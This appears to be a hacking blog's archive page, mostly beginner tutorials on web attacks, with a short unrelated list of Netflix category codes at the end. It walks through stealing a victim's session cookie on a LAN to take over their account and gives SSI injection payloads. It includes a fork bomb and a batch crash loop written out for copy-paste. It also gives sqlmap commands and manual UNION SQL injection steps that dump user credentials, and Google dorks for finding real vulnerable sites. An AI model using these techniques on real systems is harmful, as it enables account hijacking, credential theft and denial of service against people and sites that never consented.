Category Archives: (K) Web Hacking

Session Hijacking Tutorial [cookie stealing]

First of all, before going any further you have to understand what a cookie is. So what is a cookie? a cookie is a small piece of information that is stored in the user’s client (browser) when a user visits a website. It is generated by the web server and sent to the browser for authentication purpose.  Lets say you login to your facebook account, when you login a session data is being created in the facebook’s server and it sends a cookie file to your browser. when you do some activity in facebook, these two things are compared and matched everytime. So if we manage to steal this cookie file from someone we will access to their account. In this tutorial i will show you how to do this in LAN. (this method will not work if the victim is not connected to your network.)
 
 
So in this tutorial you will be using a tool called Wire Shark   and a firefox add on called Add N Edit Cookies.

When done this process, just minimize Cain And Abel.

Wire shark is a tool used to sniff packets from the network clients. we will be using this to steal our cookies.
Add N Edit Cookies add on is to inject the stolen cookie into firefox browser.

Download and install wireshark, open it up and click on “Capture” from menu bar. select your interface and click Start. this will start to capture all the packets from your network.

Now find the packets using ther filterer http.cookie.
Look for packets which has POST and GET in it. this is the http information sent to server.


Now once you found the cookie, copy its value like this:

Paste it and save it in a notepad file. Now the final thing to do is, open firefox and start the Add N Edit Cookies Add on from tools menu. Now Insert the stolen cookie here, and you’re done! you should be having access to the victim’s account now!

What is a Server Side Include Injection Attack or SSI Injection Attack ?

Many a times attackers exploit security vulnerabilities in web applications and inject their malicious codes into the server to steal sensitive data, spread malware or do other malicious activities. Server Side Includes Injection Attack or SSI Injection Attack is one such attack.
In SSI Injection Attack, the attacker takes advantage of security vulnerabilities of web applications to inject their malicious code using Server Side Includes directives and perpetrate the attacks.
What is Server Side Includes or SSI ?
Nowadays, most of the web servers handle dynamic pages. It takes input from the user in the form of text box, radio buttons, pictures etc and the information is passed to a program in the web server, which then processes the information and generates output. The output is sent back to our browser and our browser finally displays the HTML page.
But, at times dynamically generating the whole page becomes inefficient and it is not needed too. Instead, a part of the page content can be dynamically generated and it can be added to an existing HTML page. Server Side Includes are directives that are used for that purpose. Using these directives, dynamic contents can be embedded to an existing HTML page and then displayed.
For example, a webpage may display local date and time to a visitor. Dynamically generating the page every time using some program or dynamic technology may prove to be inefficient. Instead, one can put the following SSI directive to an existing HTML page :
<!–#echo var=”DATE_LOCAL” –>
As a result, whenever the page will be served to the client, this particular fragment will be evaluated and replaced with the current local date and time :
Sunday, 25-Jan-2016 12:00:00 EST
The decision of whether to use SSI directives to dynamically generate a particular fragment of the page or to dynamically generate the whole page using some dynamic technology, often depends on how much of the page is to be dynamically generated. If a major part of the page content is to be dynamically generated, then SSI may not be a good solution.
Server Side Includes Injection Attack or SSI Injection Attack
In SSI Injection Attack, the attacker first finds out whether a web application is vulnerable to Server Side Includes Injection or SSI Injection. Normally, a web application is vulnerable to SSI Injection through manipulation of existing SSI directives in use or through lacking in proper validation of user inputs.
If a web application has pages with extension .stm, .shtm, .shtml, then that would indicate to the attackers that the web application is using SSI directives to dynamically generate page contents. At this point, if the web server permits SSI execution without proper validation, then the attacker can trick the webserver to execute SSI directives to manipulate filesystem of the web server and thus, to add, modify and delete files or to display content of sensitive files like /etc/passwd.
On the other hand, the attacker can type the following characters in the user input field to find out whether the web application properly validates the user inputs :
< ! # = / . " - > and [a-zA-Z0-9]
As these are the characters often used by SSI directives, the web application will become vulnerable to SSI Injection if it cannot properly validate the user inputs and allow these characters to be present in the input when they are not expected. The attacker can take advantage of that and access sensitive information or execute shell commands for nefarious purposes.
As the SSI directives are executed before supplying the page content to the client, the data intended for the attack will be displayed the next time the webpage is loaded.
Example
Suppose, a web application is vulnerable to SSI Injection. At this point, the attacker can trick the web server to execute the following SSI directive and display current document filename :
<!–#echo var=”DOCUMENT_NAME” –>
The attacker can create a file attack.shtml with the following content :
attack.shtml

<!–#include file=”AAAA….AAAA” –>

with number of A’s more than 2049.
At this point, suppose the web application loads a legitimate URL like :
vulnerable.com/index.asp?page=about.asp
Now, the attacker can include his own file attack.shtml in the web application like :
vulnerable.com/index.asp?page=attacker.com/index.asp?page=attack.shtml


If the web server returns a blank page, that would indicate an overflow has occurred. So, the attacker can now get enough information to trick the web application to execute malicious code.



How To Stay Safe
- User inputs should be properly validated so that it does not contain characters like <, !, #, =, /, ., ", -, > and [a-zA-Z0-9] if they are not needed.
- Make sure the web server only executes SSI directives needed for a particular web page.
- HTML entity encode user inputs before passing it to a page that executes SSI directives.
- Make sure a page is executed with the permission of the file owner, instead of that of the web server user.


Being informed about various web application security vulnerabilities is the very first step towards safeguarding a web application. Hope this article served its purpose.

Denial Of Service Methods : ICMP, SYN, teardrop, botnets

In a previous post, I had introduced you to the basic idea of a denial of service attack. We used real life examples (bus stop and online game) to depict the idea behind a DOS attack. We crashed our own Windows and Kali Linux machine (using batch and command line interface respectively). Now it’s time to learn how actually DOS of service attacks work, in terms of packets and other networking terms. So here is a one by one description on four of the well known attacks.

Various methods of Denial Of Service attack

ICMP flooding (smurfing)

Before I go off explaining what the attack is, first I’ll tell you about the packets.
Contents of an ICMP packet (should not bother you currently)

ICMP packets have two purposes (technically)-

  • It is used by network devices, like routers, to send error messages indicating, for example, that a requested service is not available or that a host or router could not be reached
  • It is also used to relay query messages
Practically, all an ICMP packet does is confirm connectivity. You send a message to an IP and see if you are connected. If not, you get an error like “Destination unreachable”. Pings use the ICMP packet.
While the packet as a whole allows us to directly attack the network by flooding it with a lot of ICMP packets, the second ability listed above gives us a new advantage. We can send ICMP relay packets to a network, with a spoofed source IP (we will change our IP to that of target), and when the network will replay to our packet, it will reply to the spoofed IP, causing it to be flooded with ICMP packets. This is called indirect ICMP flooding, also known as smurfing. It is tougher to detect than a normal direct ICMP attack, and the network serves as amplifier, the larger the better, making the attack much stronger, since you have the power of many computers at your disposal, instead of just one. If the target is flooded with enough packets, it loses it ability to respond to genuine packets, resulting in a successful Denial of Service attack.

SYN flooding

The three way handshake (that didn’t happen in our case)

In SYN flooding, the attacker send the target a large number of TCP/SYN packets. These packets have a source address, and the target computer replies (TCP/SYN-ACK packet) back to the source IP, trying to establish a TCP connection. In ideal condition, the target receives an acknowledgement packet back from the source, and the connection established is in a fully open state. However, the attacker uses a fake source address while sending TCP packets to the victim, and the target’s reply goes to an inexistent IP, and therefore, does not generate an acknowledgement packet. The connection is never established, and the target is left with a half open connection. Eventually, a lot of half open connections are created, and the target network gets saturated to the point where it does not have resources left to respond to the genuine packets, resulting in a successful DOS attack. Also, since the connections stay open for a while, the server loses its ability to work for a good amount of time after the attack has been stopped.

Teardrop attack

First of all – In computer networking, a mangled or invalid packet is a packet — especially IP packet — that either lacks order or self-coherence, or contains code aimed to confuse or disrupt computers, firewalls, routers, or any service present on the network. (source : Wikipedia)
Now in  a teardrop attack, mangled IP packets are sent to the target. They are overlapping, over-sized, and loaded with payloads. Now various operating systems have a bug in their TCP/IP fragmentation re-assembly code. What that means, is when the OS tries to re-assemble the TCP/IP packets that it gets, a piece of code exploits a bug in the way the re-assembling process works, and the OS crashes. This bug has been fixed, and only Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack. This type of attack does not require much bandwidth on the user side, and has devastating effect for the targeted server.

Botnets

A small botnet

Now, this is not an attack is such, rather, it is a way of carrying out the attacks more effectively. When carried out against a large server, the above attacks usually prove ineffective. Your home router is nothing when compared to the HUGE servers that big websites have, and handling a single PCs DOS effect can be a piece of cake. This leads to the need of a Distributed Denial of Service attack. In a distributed denial of service, hacking groups use their numbers as strength. For example, if you have 500 friends who know how to carry out a denial of service attack, then the combined impact is much more dangerous than that of a lone PC. However, it is not always possible to have 500 hackers next door, and not all of us are part of large black hat hacking organisations.

Try not to end up like this

This is where the botnets steps in. Now the bad guys use tools called RATs (remote administration tools) to infect and get total control over computers over the internet. The RATs are a kind of trojan, and can lie there on your PC and you’ll never find out. By the use of crypting, some hackers have mastered anti-virus evasion, and these RATs can lie undetected on your PC for years. This is 100% illegal. You can easily end up in jail for this, and I recommend that you stay away from this. But, its important that you are aware of the existence of such tools, and more importantly, what the hackers can do with them. Now lets assume you made a RAT and its has infected 10,000 people. You can actually control those 10,000 computers. Now there’s this website server that you don’t like, and you’re this badass hacker who takes down stuff he doesn’t like. No, you don’t have a warehouse full of networking power (servers), but you do have ten thousand computers at your disposal, and this is called a botnet. You also have 5 friends who are hackers, and have similarly sized botnets. Such immense networking power can easily take down a large website for hours, if not days. The results of flooding packets from 50,000 computers can be catastrophic. With modern day firewalls, it is almost impossible to flood servers and take them down using one single computers, so while botnets are the most unethical entities, they are also the most powerful. Now here is a suggestion, Denial of Service attacks are easy to trace back (if you are a beginner), and even if you are good, there is always someone better, and you can’t hide forever. So try not to send bad packets at random websites, you won’t look good in orange

Denial Of Service Attacks : Explained for Beginners and Dummies

Just like most other things associated with hacking, a denial of service attack is not everyone’s cup of tea. It, however, can be understood if explained properly. In this tutorial, I’ll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We’ll start at the easiest point.

What effect does a denial of service attack have

 

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource from the right to use it. I mean if I successfully perform a DOS on your machine, you won’t be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance – a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people’s opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hactivists had to suffer jailtime for participating in DDOS). So basically it’s just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like “This website was down the other day” without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I’ll take the example from the movie “We Are Legion”.

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there’s a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.
Denial of service in a game
They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don’t have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.
So while this may seem impossible in the real world, in the virtual world, you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose, however, you are not recommended to use them as a DOS on someone else is illegal, and easy to detect (Knock, knock. It’s the police). We will, come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Basically, it take more than just one packet, you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, for which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and wait till the DOS stops. Now with the modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It’s just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that’s not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it’s not just the websites that get better, and the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good, the bad and the ugly).

 

A Live DOS on your Kali Machine

If you have Kali linux (The hackers OS- the OS of choice if you use this blog) the here’s a small exercise for you.
We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. It will most probably work on other linux distributions too.
Warning : This code will freeze Kali linux, and most probably it will not recover from the shock. You’ll lose any unsaved data. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). Just copy paste the code and your computer is gone.

:(){ :|:& };:

 

The machine froze right after I pressed enter. I had to power it off from the Vmware interface.
What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time. It just gave up.
Here’s something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-

:1
Start
goto 1

Save the file as name.bat
Bat here is batch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second….. infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can’t do anything.
That’s it for this tutorial, we’ll discuss the technical details of a practical denial of service in a later tutorial.

Hacking Website with Sqlmap in Kali Linux

In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we’ll be using Kali Linux (see the top navigation bar to find how to install it if you haven’t already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in theManual SQL Injection tutorial to hack websites.

Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial thatthis website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you’ll need to install Sqlmap on your own. Now if you don’t have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux

 

Sqlmap

Basically its just a tool to make Sql Injection easier. Their official website  introduces the tool as -“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.”
A lot of features can be found on the SqlMap website, the most important being – “Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.” That’s basically all the database management systems. Most of the time you’ll never come across anything other than MySql.

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type –

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the –time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-
  • Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
  • Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.
List of  a few common enumeration commands
So first we will get the names of available databases. For this we will add –dbs to our previous command. The final result will look like –

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using –tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

The result should be something like this –
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using –columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using –dump. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass –dump

Here’s the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don’t get tempted to join the dark side. You don’t look pretty behind the bars. That’s it for this tutorial.

Hacking Websites Using SQL Injection Manually

Sql Injection – Hacking Websites

In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don’t need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.

Sql Injection
SQL Injection

Finding A Vulnerable Website

The first step is obviously finding a vulnerable website. There are a lot of ways to do so. the most common method of searching is by using dorks.

Dorks

Dorks are an input query into a search engine (Google) which attempt to find websites with the given text provided in the dork itself. Basically it helps you to find websites with a specific code in their url which you know is a sign of vulnerability.
A more specific definition could be “Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.” (from 1337mir)

Using Dorks

Now basically what a dork does is uses Google’s “inurl” command to return websites which have a specific set of vulnerable words in url. For that, we need to know which words in the url make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of google dorks. For example, the l33tmir website has a list of hundreds of google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the google search bar and google will return potentially vulnerable sites. NOTE: Don’t mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:”products.php?prodID=”

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl instructs google to look at the URLs in it’s search index and provide us with the ones which have a specific line in them. Inside the inverted commas is the specific URL which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that this website uses SQL database here. After the question mark you will have a ?something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a Sql Injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them though, may not be vulnerable (i.e not the way you want them to be, they might still be having some vulnerabilities you don’t know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities

Now lets assume we used the first dork, i.e. products.php?prodID=. We then came across a sitewww.site.com/products.php?prodID=25.  Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an asterisk at the end of the url instead of 25. The url would look somewhat like this www.site.com/products.php?prodID=’
If you are lucky, then the site would be vulnerable. If it is, then there would a some kind of error showing up, which would have the words like “Not found”,”Table”,”Database”,”Row”,”Column”,”Sql”,”MysqL” or anything related to a database. In some cases, there would be no error, but there would be some berserk/ unexpected behavior on the page, like a few components not showing up properly, etc.
A typical error message

But right now you only know that the site is vulnerable. You still have to find which colums/rows are vulnerable.

Finding number of columns/rows

Now we need to find the number of columns in the table. For this, we will use trial and error method, and keep executing statements incrementing the number of columns till we get an error message.
www.site.com/products.php?prodID=25+order+by+1
Effectively, we added order by 1 to the end of the original url. If there is atleast one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Lets assume you get an error for
www.site.com/products.php?prodID=25+order+by+6
This means that the page had 5 columns, and the database couldn’t handle the query when you asked for the 6th one. So now you know two things
  • The site is vulnerable to SQL injection
  • It has 5 columns
Now you need to know which of the columns is vulnerable

Finding Vulnerable columns

Now lets assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. We now need to find which of the columns is vulnerable. To do this, enter the following into the url
www.site.com/products.php?prodID=25+union+select+1,2,3,4,5
In some cases you might need to put a – behind the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.
Let’s say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.
Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.

Unification

From here on, the things will get tough if you are not able to follow what I’m doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. The website is
The actual vulnerability is here
Notice that the URL has the structure that you now know well. If used properly, a google dork could have led us to this site as well. Now we will replace the 1 with an asterisk ‘
This is what you vulnerable page looks like to start with
As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.

10 columns. Nothing so far.
12 columns. Error….

So if there was an error on 12th columns. This means there were 11 columns total. So to find the vulnerable column, we have to execute –

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

Now we can see total four numbers on the page. 11,7,2 and 9. It won’t be hard to figure out which of them depicts the vulnerable column

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign that is). Now scroll down to the bottom. You will see this-

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that 11th column is the vulnerable one. These kind of deductions make hacking very interesting and remind you it’s more about logic and creativity than it’s about learning up useless code.
Now we are finally where we left out before we changed our stream. We need to find the sql version. It can sometimes be very tricky. But lets hope its not in this case.
Now get the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The url will look like this.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you’ll see something like

The server is using Sql version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
And the thing I said about it being tricky sometimes. Sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database

Now the method to extract data is different depending on the version . Luckily its easier for version 5, and that’s what you’ll come across most of the time, as is the case this time. All the data regarding the structure of the table is present in the information schema. This is what we’re gonna look at first.
In our query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and add prefix +from+information_schema.tables. The final url will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

As you can see, the name of the table is character_sets. However, this is just one table. We can replace the table_name with group_concat(table_name) to get all tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables

We now have the names of all the tables. Here it is – CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

It is similar to obtaining tables, other than the fact that we will use informaiton_schema.columns instead of informaiton_schema.tables, and get multiple columns instead of just one using the same group concat. We will also have to specify which table to use in hex. We will use the tableevents (I’ve highlighted it above too). In hex it’s code is 4556454e5453 (You can use text to hex convertor – also prefix 0x behind the code before entering it). The final code will be-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

 

We now know the columns of the table events

Extracting data from columns

We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Lets assume we want the data from the first column in the above pic, ie. event_catalog. We will put the fol. URL-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS

The page didn’t display properly, this means that the our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don’t let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we’ll have to look at some other table now, and then look at what columns does the table have. So, I looked at the first table in the list, CHARACTER_SETS and the first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from CHARACTER_SET_NAME column from CHARACTER_SETS table . In a similar manner you can go through other tables and columns. It will be definitely more interesting to look through a table whose name sounds like ‘USERS’ and the columns have name ‘USERNAME’ and ‘PASSWORD’.  I would show you how to organize results in a slightly better way and display multiple columns at once. This query will return you the data from 4 columns, seperated by a colon (:) whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

 

Finally you have successfully conducted an sql injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don’t know what they actually do.

SQL Injection : How It Works

Introduction

Lets get started at an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are –

  • Creating structure of table
  • Entering data
  • Making queries (and getting meaningful results from data)
Now, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in table with columns like Name, Price, Company, Screen Size, OS, etc.
Now they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget, preferred company, etc. So basically, you, the user, can create queries and request data from their SQL servers.
Now this automated method of creating queries for you is relatively safe, there is another method of creating queries which can be exploited by us. A url ending in .php is a direct indication that the website/blog uses sql to deliver a lot of it’s data, and that you can execute queries directly by changing the url. Now basically the data in the SQL tables is protected. However, when we send some rogue commands to the SQL server, it doesn’t understand what to do, and returns an error. This is a clear indication that with proper coding, we can send queries that will make the database ‘go berserk’ and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of username and passwords of all users on a website.

Steps

  1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks. Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the url, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability.
  2. After we know that a site is vulnerable, we need to execute a few queries to know what all makes it act in an unexpected manner. Then we should obtain information about SQL version and the number of tables in database and columns in the tables.
  3. Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial)
For the 2nd and 3rd step, there are 2 ways to do them-
  • Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command-

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query “UserID=105” may not be true for all user, the condition 1=1 will always be true. So basically the query will be prompted to  return all the data about the user for all the users for whom 1=1. Effectively, you have the username and passwords and all other information about all the users of the website.

The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts.
  • Using some tool – Some tools help in making the process easier. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. I don’t recommend all the GUI Windows tools which are found on malware filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali linux installed. In Kali linux, there is a great tool called SQLMap that we’ll be using.
That’s it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Also, check out the navigation bar at the top of the blog to see if you find something that interests you. We have a lot of tutorials for beginners in the field of hacking.

How to use secret Netflix codes to unlock hidden show and movie categories

SECRET codes can unlock shows and movies you never knew were hiding in the Netflix library. Here’s how to find them.

Netflix Secret Codes List

  • Action & Adventure: 1365
  • Action Comedies: 43040
  • Action Sci-Fi & Fantasy: 1568
  • Action Thrillers: 43048
  • Adult Animation: 11881
  • Adventures: 7442
  • African Movies: 3761
  • Alien Sci-Fi: 3327
  • Animal Tales: 5507
  • Anime: 7424
  • Anime Action: 2653
  • Anime Comedies: 9302
  • Anime Dramas: 452
  • Anime Fantasy: 11146
  • Anime Features: 3063
  • Anime Horror: 10695
  • Anime Sci-Fi: 2729
